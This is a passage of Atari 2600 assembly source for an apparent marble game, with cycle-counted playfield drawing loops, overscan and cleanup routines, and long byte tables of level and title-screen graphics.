; [2, 28] NOP ; [2, 30] NOP ; [2, 32] NOP ; [2, 34] LDA Level_0_BlueData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_BlueData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY ; frame pointer DEX ; marble pointer BPL DrawLoopBank1Pass2 ;======================= ;============= DrawLoopBank1Pass3 ;========== STA WSYNC ; [2, 4 = first even frame completed] ;========== LDA #$08 ; white ; [2] (same as NTSC and PAL) STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_WhiteData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_WhiteData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_WhiteData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_WhiteData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == ;========== STA WSYNC ; [3, = first odd frame completed] ;========== IF LEVEL == 0 IF NTSC LDA #$22 ; brown ELSE ; (PAL) LDA #$42 ; brown ENDIF ENDIF IF LEVEL == 1 IF NTSC LDA #$82 ; blue ELSE ; (PAL) LDA #$D2 ; blue ENDIF ENDIF STA COLUPF ; [3, 5] ;==== NEW CODE ==== LDA Level_0_BlueData_PF1_1,Y ; [4, 9] STA PF1 ; [3, 12] LDA Level_0_BlueData_PF2_2,Y ; [4, 16] STA PF2 ; [3, 19] NOP ; [2, 21] NOP ; [2, 23] NOP ; [2, 25] NOP ; [2, 27] NOP ; [2, 29] NOP ; [2, 31] LDA $80 ; [3, 34] LDA Level_0_BlueData_PF1_4,Y ; [4, 38] STA PF1 ; [3, 41] LDA Level_0_BlueData_PF2_3,Y ; [4, 45] STA PF2 ; [3, 48] ;== END NEW CODE == DEY CPY ScrollPointerBottom BPL DrawLoopBank1Pass3 ;======================= ;======================== ; scanline 192 ;======================== CleanupScreen ; Clear all registers here to prevent any possible bleeding. LDA #2 STA WSYNC ; Finish this scanline. STA VBLANK ; Make TIA output invisible, ; Now we need to worry about it bleeding when we turn ; the TIA output back on. LDY #0 STY PF0 STY PF1 STY PF2 STY GRP1 STY GRP0 STY VDELP1 STY ENAM0 STY ENAM1 STY ENABL ;========== LDA OddFrameCheck BNE ReturnFromDrawScreen STA WSYNC ;========== ReturnFromDrawScreen ;================== RTS ;================== ;================= OverScanBank1 ;================= IF NTSC LDA #35 ELSE ; (PAL) LDA #85 ENDIF STA TIM64T ;================= GameCalc2Bank1 ;================= ;================== ; Handle collisions ;================== JMP Bank3 ;(JSR HandleCollision) ;================== ; Clear them for next time ;================== AfterCollision_InBank1 LDA #0 STA CXCLR ;============================ ; Loop to get our 30 scanlines for overscan ;============================ WaitForEndOfOverscanBank1 LDA INTIM BNE WaitForEndOfOverscanBank1 STA WSYNC ; finish scanline 30 ;================== RTS ;================== ;==================== ; GRAPHICS DATA BELOW ;==================== ;REF=- (D0 of CTRLPF) ;\| 4567 \| 76543210 \| 01234567 \| 4567 \| 76543210 \| 01234567 \| ;\| PF0 \| PF1 \| PF2 \| PF0 \| PF1 \| PF2 \| ; ;REF=1 (D0 of CTRLPF) ;\| 4567 \| 76543210 \| 01234567 \| 76543210 \| 01234567 \| 7654 \| ;\| PF0 \| PF1 \| PF2 \| PF2 \| PF1 \| PF0 \| ;========== ;ORG $C700 align 256 ;========== Level_0_WhiteData_PF1_1 ; 20-0 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 ; 40-21 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $82 dc.b $A2 dc.b $83 dc.b $A0 dc.b $C5 dc.b $22 dc.b $57 dc.b $AA dc.b $F4 dc.b $BA dc.b $5D dc.b $2E dc.b $17 dc.b $0A dc.b $15 ; 60-41 dc.b $8A dc.b $DC dc.b $A8 dc.b $50 dc.b $A8 dc.b $5C dc.b $AA dc.b $55 dc.b $BA dc.b $55 dc.b $AA dc.b $75 dc.b $AA dc.b $D5 dc.b $A9 dc.b $71 dc.b $A9 dc.b $C9 dc.b $A9 dc.b $29 ; 80-61 dc.b $A9 dc.b $A8 dc.b $A8 dc.b $AA dc.b $A9 dc.b $A9 dc.b $A9 dc.b $AB dc.b $A8 dc.b $A8 dc.b $A8 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA ; 100-81 dc.b $AA dc.b $AB dc.b $A8 dc.b $AD dc.b $A2 dc.b $B5 dc.b $88 dc.b $D9 dc.b $22 dc.b $67 dc.b $8A dc.b $1D dc.b $2A dc.b $77 dc.b $AA dc.b $9D dc.b $AA dc.b $A7 dc.b $AA dc.b $A9 ; 120-101 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $A8 dc.b $A9 dc.b $A8 dc.b $AD dc.b $AB dc.b $A3 dc.b $A3 dc.b $B5 dc.b $AE dc.b $8F ; 140-121 dc.b $8F dc.b $D7 dc.b $BB dc.b $3D dc.b $3E dc.b $5F dc.b $EF dc.b $F6 dc.b $FA dc.b $FD dc.b $7D dc.b $B9 dc.b $D8 dc.b $A0 dc.b $60 dc.b $A8 dc.b $C8 dc.b $B4 dc.b $70 dc.b $B2 ; 160-141 dc.b $AA dc.b $DD dc.b $DC dc.b $AC dc.b $AA dc.b $77 dc.b $72 dc.b $AD dc.b $AE dc.b $DF dc.b $CE dc.b $B6 dc.b $B9 dc.b $7D dc.b $BA dc.b $DA dc.b $A7 dc.b $77 dc.b $AA dc.b $9A ; 180-161 dc.b $BD dc.b $59 dc.b $16 dc.b $2E dc.b $0F dc.b $16 dc.b $25 dc.b $2A dc.b $23 dc.b $32 dc.b $29 dc.b $2A dc.b $17 dc.b $46 dc.b $26 dc.b $29 dc.b $5D dc.b $9A dc.b $1A dc.b $27 ; 200-181 dc.b $77 dc.b $AA dc.b $DA dc.b $BD dc.b $79 dc.b $B6 dc.b $AE dc.b $DF dc.b $DE dc.b $AC dc.b $A8 dc.b $70 dc.b $70 dc.b $A0 dc.b $A0 dc.b $C0 dc.b $C0 dc.b $80 dc.b $80 dc.b $00 Title_PF1_1 ; 1 dc.b $00 ; unused for now ; 20 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $AB dc.b $AB dc.b $AB dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $51 ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $AB dc.b $AB dc.b $AB dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $FB dc.b $51 ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $C800 align 256 ;========== Level_0_WhiteData_PF2_2 ; 20-0 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $01 ; 40-21 dc.b $05 dc.b $01 dc.b $05 dc.b $01 dc.b $05 dc.b $03 dc.b $04 dc.b $0E dc.b $15 dc.b $3B dc.b $51 dc.b $E0 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $01 dc.b $03 dc.b $05 dc.b $0A ; 60-41 dc.b $13 dc.b $2B dc.b $4D dc.b $AC dc.b $34 dc.b $B0 dc.b $D0 dc.b $C8 dc.b $49 dc.b $2B dc.b $29 dc.b $AA dc.b $6A dc.b $8A dc.b $5A dc.b $22 dc.b $56 dc.b $C8 dc.b $D5 dc.b $B2 ; 80-61 dc.b $36 dc.b $2D dc.b $13 dc.b $2B dc.b $4A dc.b $AD dc.b $34 dc.b $B0 dc.b $D4 dc.b $C5 dc.b $55 dc.b $15 dc.b $55 dc.b $D5 dc.b $15 dc.b $B5 dc.b $45 dc.b $2D dc.b $51 dc.b $CB ; 100-81 dc.b $D4 dc.b $B2 dc.b $35 dc.b $A6 dc.b $56 dc.b $9A dc.b $59 dc.b $6B dc.b $65 dc.b $AE dc.b $95 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB ; 120-101 dc.b $55 dc.b $EE dc.b $55 dc.b $B9 dc.b $55 dc.b $ED dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EF dc.b $4F dc.b $B6 ; 140-121 dc.b $55 dc.b $EB dc.b $47 dc.b $8D dc.b $03 dc.b $88 dc.b $1C dc.b $AA dc.b $77 dc.b $AA dc.b $05 dc.b $8E dc.b $03 dc.b $09 dc.b $1C dc.b $2A dc.b $77 dc.b $2A dc.b $05 dc.b $0F ; 160-141 dc.b $03 dc.b $01 dc.b $0C dc.b $06 dc.b $0E dc.b $04 dc.b $0D dc.b $01 dc.b $09 dc.b $22 dc.b $15 dc.b $45 dc.b $53 dc.b $BB dc.b $35 dc.b $35 dc.b $4E dc.b $EE dc.b $55 dc.b $B5 ; 180-161 dc.b $7B dc.b $F3 dc.b $6D dc.b $5D dc.b $BE dc.b $BD dc.b $5B dc.b $55 dc.b $EE dc.b $E5 dc.b $5B dc.b $5D dc.b $BE dc.b $9D dc.b $6D dc.b $73 dc.b $FB dc.b $75 dc.b $B5 dc.b $4E ; 200-181 dc.b $EE dc.b $55 dc.b $B5 dc.b $7B dc.b $F3 dc.b $6D dc.b $5D dc.b $BE dc.b $BC dc.b $58 dc.b $50 dc.b $E0 dc.b $E0 dc.b $40 dc.b $40 dc.b $80 dc.b $80 dc.b $00 dc.b $00 dc.b $00 Title_PF2_2 ; 1 dc.b $00 ; unused for now ; 20 dc.b $4D dc.b $5D dc.b $5D dc.b $5D dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $55 dc.b $5D dc.b $5D dc.b $5D dc.b $4C ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $D5 dc.b $D5 dc.b $D5 dc.b $5D dc.b $4D dc.b $4D dc.b $4D dc.b $5D dc.b $DD dc.b $DD dc.b $D5 dc.b $D5 dc.b $55 dc.b $55 dc.b $55 dc.b $5D dc.b $5D dc.b $DD dc.b $DD dc.b $CC ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $C900 align 256 ;========== Level_0_WhiteData_PF2_3 ; 20-0 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 ; 40-21 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $02 dc.b $03 dc.b $80 dc.b $C5 dc.b $A2 dc.b $75 dc.b $2A dc.b $1D dc.b $0A dc.b $05 ; 60-41 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $80 dc.b $40 dc.b $20 dc.b $50 dc.b $C8 dc.b $D8 dc.b $B4 dc.b $4C dc.b $AC dc.b $2A dc.b $B6 dc.b $D2 dc.b $C3 dc.b $40 dc.b $05 dc.b $04 ; 80-61 dc.b $06 dc.b $01 dc.b $0A dc.b $07 dc.b $02 dc.b $01 dc.b $80 dc.b $40 dc.b $20 dc.b $50 dc.b $C8 dc.b $D8 dc.b $B4 dc.b $4C dc.b $AC dc.b $2A dc.b $B6 dc.b $D2 dc.b $C3 dc.b $40 ; 100-81 dc.b $00 dc.b $00 dc.b $80 dc.b $40 dc.b $20 dc.b $30 dc.b $88 dc.b $4C dc.b $A2 dc.b $93 dc.b $A8 dc.b $64 dc.b $6A dc.b $5B dc.b $9C dc.b $DD dc.b $AA dc.b $77 dc.b $AA dc.b $DD ; 120-101 dc.b $AA dc.b $77 dc.b $AA dc.b $DC dc.b $A8 dc.b $70 dc.b $A8 dc.b $DC dc.b $AA dc.b $77 dc.b $AA dc.b $DD dc.b $AA dc.b $77 dc.b $AA dc.b $DD dc.b $AB dc.b $77 dc.b $A7 dc.b $DB ; 140-121 dc.b $AA dc.b $75 dc.b $A9 dc.b $DC dc.b $B0 dc.b $64 dc.b $8E dc.b $D5 dc.b $BB dc.b $55 dc.b $A8 dc.b $FC dc.b $B0 dc.b $24 dc.b $0E dc.b $15 dc.b $3B dc.b $15 dc.b $28 dc.b $3C ; 160-141 dc.b $30 dc.b $20 dc.b $0C dc.b $18 dc.b $1C dc.b $08 dc.b $2C dc.b $20 dc.b $04 dc.b $11 dc.b $4A ; dc.b $22 dc.b $29 dc.b $5D dc.b $9A dc.b $9A dc.b $A7 dc.b $77 dc.b $AA dc.b $DA ; 180-161 dc.b $BD dc.b $79 dc.b $B6 dc.b $AE dc.b $DF dc.b $DE dc.b $AD dc.b $AA dc.b $77 dc.b $72 dc.b $AD dc.b $AE dc.b $DF dc.b $CE dc.b $B6 dc.b $B9 dc.b $7D dc.b $BA dc.b $DA dc.b $A7 ; 200-181 dc.b $77 dc.b $AA dc.b $DA dc.b $BD dc.b $79 dc.b $B6 dc.b $AE dc.b $DF dc.b $DE dc.b $AC dc.b $A8 dc.b $70 dc.b $70 dc.b $A0 dc.b $A0 dc.b $C0 dc.b $C0 dc.b $80 dc.b $80 dc.b $00 Title_PF2_3 ; 1 dc.b $00 ; unused for now ; 20 dc.b $5D dc.b $5D dc.b $5D dc.b $5D dc.b $50 dc.b $D0 dc.b $D0 dc.b $D0 dc.b $D9 dc.b $D9 dc.b $59 dc.b $59 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $5D dc.b $5D dc.b $5D dc.b $5D ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $3B dc.b $3B dc.b $BB dc.b $BB dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A3 dc.b $23 dc.b $23 dc.b $A3 dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A2 dc.b $A3 dc.b $A3 dc.b $23 dc.b $23 ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $CA00 align 256 ;========== Level_0_WhiteData_PF1_4 ; 20-0 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 ; 40-21 dc.b $55 dc.b $55 dc.b $55 dc.b $D5 dc.b $15 dc.b $B5 dc.b $45 dc.b $ED dc.b $51 dc.b $BB dc.b $54 dc.b $EE dc.b $55 dc.b $AB dc.b $55 dc.b $EA dc.b $55 dc.b $AA dc.b $55 dc.b $EE ; 60-41 dc.b $55 dc.b $BA dc.b $55 dc.b $EE dc.b $54 dc.b $BA dc.b $52 dc.b $EA dc.b $56 dc.b $B8 dc.b $55 dc.b $EE dc.b $54 dc.b $BA dc.b $52 dc.b $EA dc.b $56 dc.b $B8 dc.b $55 dc.b $EE ; 80-61 dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $55 dc.b $BB dc.b $55 dc.b $EE dc.b $54 dc.b $B8 dc.b $50 dc.b $E0 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 100-81 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $01 dc.b $03 dc.b $04 dc.b $08 dc.b $11 dc.b $3B dc.b $15 dc.b $0E dc.b $05 dc.b $03 ; 120-101 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $01 dc.b $03 dc.b $01 dc.b $02 dc.b $07 dc.b $07 dc.b $07 dc.b $0B dc.b $1D dc.b $1E ; 140-121 dc.b $1F dc.b $2F dc.b $77 dc.b $7B dc.b $7D dc.b $BE dc.b $DE dc.b $EC dc.b $F5 dc.b $FA dc.b $FB dc.b $72 dc.b $B4 dc.b $44 dc.b $CC dc.b $54 dc.b $91 dc.b $6A dc.b $E0 dc.b $64 ; 160-141 dc.b $54 dc.b $BA dc.b $B8 dc.b $58 dc.b $54 dc.b $EE dc.b $E5 dc.b $5B dc.b $5D dc.b $BE dc.b $9D dc.b $6D dc.b $73 dc.b $FB dc.b $75 dc.b $B5 dc.b $4E dc.b $EE dc.b $55 dc.b $35 ; 180-161 dc.b $7B dc.b $B3 dc.b $2D dc.b $5D dc.b $1E dc.b $2D dc.b $0B dc.b $15 dc.b $06 dc.b $05 dc.b $13 dc.b $15 dc.b $2E dc.b $0D dc.b $4D dc.b $53 dc.b $BB dc.b $35 dc.b $35 dc.b $47 ; 200-181 dc.b $EE dc.b $55 dc.b $B5 dc.b $7B dc.b $F3 dc.b $6D dc.b $5D dc.b $BE dc.b $BC dc.b $58 dc.b $50 dc.b $E0 dc.b $E0 dc.b $40 dc.b $40 dc.b $80 dc.b $80 dc.b $00 dc.b $00 dc.b $00 Title_PF1_4 ; 1 dc.b $00 ; unused for now ; 20 dc.b $3B dc.b $3B dc.b $3B dc.b $3B dc.b $22 dc.b $22 dc.b $22 dc.b $22 dc.b $3B dc.b $3B dc.b $3B dc.b $3B dc.b $08 dc.b $08 dc.b $08 dc.b $08 dc.b $3B dc.b $3B dc.b $3B dc.b $3B ; 8 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 20 dc.b $01 dc.b $01 dc.b $01 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $01 dc.b $01 dc.b $01 dc.b $01 ; 5 dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now dc.b $00 ; unused for now ; 1 dc.b $FF ; unused for now ;========== ;ORG $CB00 align 256 ;========== Level_0_BlueData_PF1_1 ; 20-0 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 ; 40-21 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $82 dc.b $8A dc.b $83 dc.b $8A dc.b $D4 dc.b $88 dc.b $20 dc.b $50 dc.b $89 dc.b $84 dc.b $42 dc.b $21 dc.b $50 dc.b $C8 dc.b $55 ; 60-41 dc.b $22 dc.b $00 dc.b $00 dc.b $25 dc.b $63 dc.b $41 dc.b $00 dc.b $22 dc.b $66 dc.b $44 dc.b $00 dc.b $02 dc.b $06 dc.b $05 dc.b $01 dc.b $01 dc.b $09 dc.b $09 dc.b $29 dc.b $29 ; 80-61 dc.b $A9 dc.b $A9 dc.b $A8 dc.b $A8 dc.b $AA dc.b $A8 dc.b $A8 dc.b $A8 dc.b $A8 dc.b $A8 dc.b $A9 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA ; 100-81 dc.b $AA dc.b $AB dc.b $AA dc.b $AC dc.b $A8 dc.b $B2 dc.b $A2 dc.b $C6 dc.b $8C dc.b $18 dc.b $30 dc.b $A0 dc.b $C0 dc.b $80 dc.b $80 dc.b $80 dc.b $A0 dc.b $A0 dc.b $A8 dc.b $A8 ; 120-101 dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AA dc.b $AB dc.b $AA dc.b $A8 dc.b $A8 dc.b $AC dc.b $A8 dc.b $A8 dc.b $A0 dc.b $B0 dc.b $A0 dc.b $A0 ; 140-121 dc.b $A0 dc.b $C0 dc.b $A0 dc.b $A0 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $12 dc.b $16 dc.b $12 dc.b $12 dc.b $09 dc.b $08 dc.b $04 ; 160-141 dc.b $04 dc.b $02 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $40 ; 180-161 dc.b $40 dc.b $20 dc.b $20 dc.b $90 dc.b $10 dc.b $88 dc.b $28 dc.b $A4 dc.b $24 dc.b $B4 dc.b $24 dc.b $A4 dc.b $08 dc.b $C8 dc.b $10 dc.b $90 dc.b $20 dc.b $20 dc.b $40 dc.b $80 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;========== ;ORG $CC00 align 256 ;========== Level_0_BlueData_PF2_2 ; 20-0 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 ; 40-21 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $51 dc.b $5B dc.b $51 dc.b $60 dc.b $40 dc.b $80 dc.b $04 dc.b $04 dc.b $15 dc.b $15 dc.b $55 dc.b $56 dc.b $54 dc.b $59 dc.b $51 dc.b $60 ; 60-41 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $03 dc.b $0A dc.b $0C dc.b $28 dc.b $28 dc.b $AA dc.b $6A dc.b $2A dc.b $1A dc.b $0A dc.b $06 dc.b $02 dc.b $00 dc.b $01 ; 80-61 dc.b $00 dc.b $00 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $04 dc.b $0D dc.b $15 dc.b $35 dc.b $55 dc.b $D5 dc.b $55 dc.b $35 dc.b $15 dc.b $0D dc.b $05 dc.b $03 ; 100-81 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 120-101 dc.b $00 dc.b $00 dc.b $01 dc.b $01 dc.b $05 dc.b $0D dc.b $05 dc.b $03 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 140-121 dc.b $00 dc.b $08 dc.b $10 dc.b $3C dc.b $74 dc.b $62 dc.b $40 dc.b $00 dc.b $00 dc.b $08 dc.b $54 dc.b $7E dc.b $77 dc.b $63 dc.b $41 dc.b $00 dc.b $00 dc.b $08 dc.b $55 dc.b $7F ; 160-141 dc.b $77 dc.b $6B dc.b $51 dc.b $3C dc.b $7F dc.b $3E dc.b $3E dc.b $5C dc.b $5C dc.b $08 dc.b $88 dc.b $30 dc.b $20 dc.b $40 dc.b $40 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 180-161 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;========== ;ORG $CD00 align 256 ;========== Level_0_BlueData_PF2_3 ; 20-0 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 ; 40-21 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $A2 dc.b $AA dc.b $63 dc.b $2A dc.b $14 dc.b $08 dc.b $00 dc.b $81 dc.b $81 dc.b $A0 dc.b $A0 ; 60-41 dc.b $A9 dc.b $A9 dc.b $AA dc.b $6A dc.b $2A dc.b $1A dc.b $0A dc.b $02 dc.b $06 dc.b $02 dc.b $02 dc.b $00 dc.b $00 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $25 dc.b $25 ; 80-61 dc.b $A6 dc.b $A4 dc.b $A8 dc.b $A0 dc.b $A8 dc.b $68 dc.b $2A dc.b $1A dc.b $0A dc.b $02 dc.b $06 dc.b $02 dc.b $02 dc.b $00 dc.b $00 dc.b $01 dc.b $00 dc.b $00 dc.b $08 dc.b $10 ; 100-81 dc.b $34 dc.b $D6 dc.b $35 dc.b $95 dc.b $8D dc.b $C5 dc.b $63 dc.b $31 dc.b $18 dc.b $0C dc.b $06 dc.b $03 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 120-101 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $06 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 140-121 dc.b $00 dc.b $04 dc.b $08 dc.b $1E dc.b $3A dc.b $31 dc.b $20 dc.b $00 dc.b $00 dc.b $04 dc.b $2A dc.b $3F dc.b $3B dc.b $31 dc.b $A0 dc.b $00 dc.b $80 dc.b $04 dc.b $AA dc.b $3F ; 160-141 dc.b $BB dc.b $35 dc.b $A2 dc.b $0F dc.b $BF dc.b $1F dc.b $9F dc.b $2E dc.b $AE dc.b $04 dc.b $C4 dc.b $18 dc.b $90 dc.b $20 dc.b $20 dc.b $40 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 180-161 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;========== ;ORG $CE00 align 256 ;========== Level_0_BlueData_PF1_4 ; 20-0 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 ; 40-21 dc.b $55 dc.b $55 dc.b $55 dc.b $D5 dc.b $55 dc.b $35 dc.b $15 dc.b $0D dc.b $05 dc.b $03 dc.b $01 dc.b $00 dc.b $08 dc.b $18 dc.b $10 dc.b $00 dc.b $08 dc.b $19 dc.b $11 dc.b $00 ; 60-41 dc.b $00 dc.b $01 dc.b $01 dc.b $00 dc.b $00 dc.b $02 dc.b $02 dc.b $0A dc.b $06 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $02 dc.b $02 dc.b $0A dc.b $06 dc.b $02 dc.b $01 dc.b $00 ; 80-61 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $02 dc.b $02 dc.b $0A dc.b 